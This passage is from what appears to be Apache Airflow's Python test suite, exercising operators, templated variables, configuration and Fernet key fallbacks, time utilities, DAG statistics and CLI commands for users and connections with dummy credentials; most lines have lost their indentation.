t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
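        # Embed this test's PID in the sleep duration so the spawned `sleep` process can
        # be identified unambiguously when scanning psutil below.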
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
        def trigga(context, obj):
            return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
            if templates_dict['ds'] != ds:
                raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
        # Check that both the returned value and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
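        # The third argument is the rounding anchor: results snap to whole multiples of
        # the interval counted from that start date.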
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
        # use assert_array_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
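        # Dispose of pooled connections so this process does not reuse sockets that the
        # forked child may be holding.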
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        except Exception:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
        # The recorded failure duration should cover at least the 3-second execution timeout
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
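        # Sanity call: updating stats with an empty dag_id list should be a no-op.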
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
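        # The callable receives the dag-run object prepared by TriggerDagRunOperator;
        # overriding its run_id lets the test locate the triggered run afterwards.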
        def payload_generator(context, dag_run_obj):
            dag_run_obj.run_id = run_id
            return dag_run_obj
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
        self.assertEqual(len(dag_runs), 1)
        dag_run = dag_runs[0]
        self.assertEqual(dag_run.execution_date, utc_now)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
configuration.load_test_config()
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'create_user', '-u', 'test3', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@example.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
args = self.parser.parse_args([
'delete_user', '-u', 'test3',
])
cli.delete_user(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'create_user', '-u', 'user{}'.format(i), '-l', 'doe', '-f', 'jon',
'-e', 'jdoe+{}@gmail.com'.format(i), '-r', 'Viewer',
'--use_random_password'
])
cli.create_user(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.list_users(self.parser.parse_args(['list_users']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_sync_perm(self):
        # verify that the sync_perm CLI command runs without raising
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
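        # Parse the pretty-printed table: every other line is a data row, and the first
        # two quoted tokens on it are the conn_id and conn_type.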
        conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
        # Prepare to verify the connections added above
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
        # Verify that each added connection was stored with the expected attributes
        for index in range(1, 7):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
        # Attempt to delete a non-existing connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
